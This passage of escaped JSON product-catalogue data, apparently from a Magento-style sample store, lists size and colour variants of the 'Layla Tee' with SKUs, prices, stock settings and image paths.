Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1390\":{\"sku\":\"WS04-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-M-Red\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1391\":{\"sku\":\"WS04-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-L-Blue\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1392\":{\"sku\":\"WS04-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-L-Green\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1393\":{\"sku\":\"WS04-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-L-Red\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1394\":{\"sku\":\"WS04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XL-Blue\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1395\":{\"sku\":\"WS04-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XL-Green\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1396\":{\"sku\":\"WS04-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee-XL-Red\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"layla-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1397\":{\"sku\":\"WS04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Layla Tee\",\"description\":\"<p>Work out or hang out in chic style in the Layla Tee. With a lightweight sheer design and a roomy neckline, this tee fits you comfortably while looking stylish.<\\/p>\\n<p>&bull; Teal tee.<br \\/>&bull; Long back hem.<br \\/>&bull; Dropped shoulders.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS04-XS-Blue,size=XS,color=Blue|sku=WS04-XS-Green,size=XS,color=Green|sku=WS04-XS-Red,size=XS,color=Red|sku=WS04-S-Blue,size=S,color=Blue|sku=WS04-S-Green,size=S,color=Green|sku=WS04-S-Red,size=S,color=Red|sku=WS04-M-Blue,size=M,color=Blue|sku=WS04-M-Green,size=M,color=Green|sku=WS04-M-Red,size=M,color=Red|sku=WS04-L-Blue,size=L,color=Blue|sku=WS04-L-Green,size=L,color=Green|sku=WS04-L-Red,size=L,color=Red|sku=WS04-XL-Blue,size=XL,color=Blue|sku=WS04-XL-Green,size=XL,color=Green|sku=WS04-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1398\